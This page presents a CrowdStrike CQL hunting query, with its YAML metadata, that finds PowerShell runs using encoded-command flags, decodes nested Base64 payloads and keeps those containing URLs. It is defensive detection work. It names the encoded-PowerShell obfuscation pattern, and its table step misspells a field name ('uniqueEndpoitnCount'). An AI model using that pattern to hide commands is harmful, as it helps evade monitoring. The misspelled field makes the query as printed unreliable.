← Back to Explore
crowdstrike_cqlHunting
Detect and Decode Base64-Encoded PowerShell Commands - http
The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20Base64.md)
Detection Query
#event_simpleName=ProcessRollup2 event_platform=Win ImageFileName=/.*\\powershell\.exe/
| CommandLine=/.*\s+\-(e|encoded|encodedcommand|enc)\s+.*/
| length("CommandLine", as="cmdLength")
| groupby([CommandLine], function=stats([count(aid, distinct=true, as="uniqueEndpointCount"), count(aid, as="executionCount")]), limit=max)
| EncodedString := splitString(field=CommandLine, by="-e* ", index=1)
| CmdLinePrefix := splitString(field=CommandLine, by="-e* ", index=0)
| DecodedString := base64Decode(EncodedString, charset="UTF-16LE")
// Look for encoded messages in the decoded message and decode those too.
| case {
DecodedString = /encoded/i
| SubEncodedString := splitString(field=DecodedString, by="-EncodedCommand ", index=1)
| SubCmdLinePrefix := splitString(field=EncodedString, by="-EncodedCommand ", index=0)
| SubDecodedString := base64Decode(SubEncodedString, charset="UTF-16LE");
*
}
| DecodedString=/.*https?\:\/\/.*/
| table([executionCount, uniqueEndpoitnCount, DecodedString, CommandLine])
| sort(executionCount, order=desc)
Author
CrowdStrike
Data Sources
Endpoint
Platforms
windows
Tags
Huntingcs_module:Insight
Raw Content
# --- Query Metadata ---
# Human-readable name for the query. Will be displayed as the title.
name: Detect and Decode Base64-Encoded PowerShell Commands - http
# Description of what the query does and its purpose.
description: The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity.
# The author or team that created the query.
author: CrowdStrike
# The required log sources to run this query successfully in Next-Gen SIEM.
# This will be displayed in the UI to inform the user.
log_sources:
- Endpoint
# The CrowdStrike modules required to run this query.
cs_required_modules:
- Insight
# Tags for filtering and categorization.
# Include relevant techniques, tactics, or platforms.
tags:
- Hunting
# --- Query Content ---
# The actual CrowdStrike Query Language (CQL) code.
# Using the YAML block scalar `|` allows for multi-line strings.
cql: |
#event_simpleName=ProcessRollup2 event_platform=Win ImageFileName=/.*\\powershell\.exe/
| CommandLine=/.*\s+\-(e|encoded|encodedcommand|enc)\s+.*/
| length("CommandLine", as="cmdLength")
| groupby([CommandLine], function=stats([count(aid, distinct=true, as="uniqueEndpointCount"), count(aid, as="executionCount")]), limit=max)
| EncodedString := splitString(field=CommandLine, by="-e* ", index=1)
| CmdLinePrefix := splitString(field=CommandLine, by="-e* ", index=0)
| DecodedString := base64Decode(EncodedString, charset="UTF-16LE")
// Look for encoded messages in the decoded message and decode those too.
| case {
DecodedString = /encoded/i
| SubEncodedString := splitString(field=DecodedString, by="-EncodedCommand ", index=1)
| SubCmdLinePrefix := splitString(field=EncodedString, by="-EncodedCommand ", index=0)
| SubDecodedString := base64Decode(SubEncodedString, charset="UTF-16LE");
*
}
| DecodedString=/.*https?\:\/\/.*/
| table([executionCount, uniqueEndpoitnCount, DecodedString, CommandLine])
| sort(executionCount, order=desc)
# Explanation of the query.
# Using the YAML block scalar `|` allows for multi-line strings.
# Uses markdown for formatting on the webpage.
explanation: |
Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20Base64.md)